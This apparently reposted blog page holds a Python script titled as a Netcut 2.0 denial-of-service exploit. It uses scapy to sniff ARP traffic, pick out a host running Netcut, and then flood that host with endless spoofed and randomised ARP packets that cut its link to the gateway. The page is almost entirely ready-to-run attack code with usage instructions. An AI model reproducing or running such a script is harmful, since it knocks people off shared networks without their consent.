หน้าเว็บ

วันศุกร์ที่ 6 มกราคม พ.ศ. 2555

Netcut 2.0 Denial of Service Vulnerability


#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
#Blog: http://mayaseven.blogspot.com
#PoC: Video http://www.youtube.com/user/mayaseven
#Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
  
def protect(gw_ip,gw_mac):
  os.popen("arp -s %s %s" %(gw_ip,gw_mac))
  print "Protected himself"
  
def detect():
    ans = sniff(filter='arp',timeout=7)
    target=[]
    for r in ans.res:
      target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) 
    return target

def preattack(gw_ip):
  num = []
  count = 0
  target = 0
  temp = 0
  print "Detecting..."
  d = detect()
  for i in range(len(d)):
    if d[i].split()[0] == "255.255.255.255":
      num.append(d.count(d[i])) 
      if d.count(d[i]) > count:
        count = d.count(d[i])
        target = i
    if d[i].split()[0] == gw_ip:
      temp += 1    
  if len(d) < 7:
    print "[-] No one use Netcut or try again"
    exit()
  if len(num)*7 < temp:
    num[:] = []
    count = 0
    result = float(temp)/len(d)*100
    for j in range(len(d)):
      if d[i].split()[0] == gw_ip:
        num.append(d.count(d[j]))
        if d.count(d[i]) > count:
          count = d.count(d[i])
          target = i
      num.reverse()
      result = float(temp)/len(d)*100
    print target 
  else:
    num.reverse()
    result = float(num[0]+temp)/len(d)*100
  
  print "There is a possibility that " + str(result) + "%"
  if result>= 50:
    target_mac = d[target].split()[1]
    target_ip = d[target].split()[2]
    print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
    attack(target_mac,target_ip,gw_ip)  
  else:
    print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
  print "[+]Counter Attack !!!"
  e = Ether(dst="FF:FF:FF:FF:FF:FF")
  while 1:
    a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
    p = e/a/Padding("\x00"*18)
    sendp(p,verbose=0)
    a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
    p1 = e/a1/Padding("\x00"*18)
    sendp(p1,verbose=0)
    
if __name__ == '__main__':
  os.system("clear")
  print  "###################################################"
  print  " __ __  __   __  _____  __   __ _  _"
  print  "| \/ |  \ \  / /  / ____| \ \  / / | \ | |"
  print  "| \ / | __ \ \_/ /_ _| (___  __\ \ / /__| \| |"
  print  "| |\/| |/ _\ \  / _\ |\___ \ / _ \ \/ / _ \ . \ |"
  print  "| | | | (_| || | (_| |____) | __/\ / __/ |\ |"
  print  "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
  print  " "
  print  "###################################################"
  print  ""
  print  "http://mayaseven.blogspot.com"
  print  ""
  if len(sys.argv) == 2 or len(sys.argv) == 3:
    if len(sys.argv) == 2:
      conf.iface=sys.argv[1]
      preattack(gw_ip)
    if len(sys.argv) == 3:
      conf.iface=sys.argv[1]
      gw_mac = sys.argv[2]
      protect(gw_ip,gw_mac)
      preattack(gw_ip)
  else:
    print '''Mode:  
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. NetcutKiller.py wlan0
    
2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway> 
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF 
''' 


# 1337day.com [2012-01-04]
Ref : http://mayaseven.blogspot.com :)

ไม่มีความคิดเห็น:

แสดงความคิดเห็น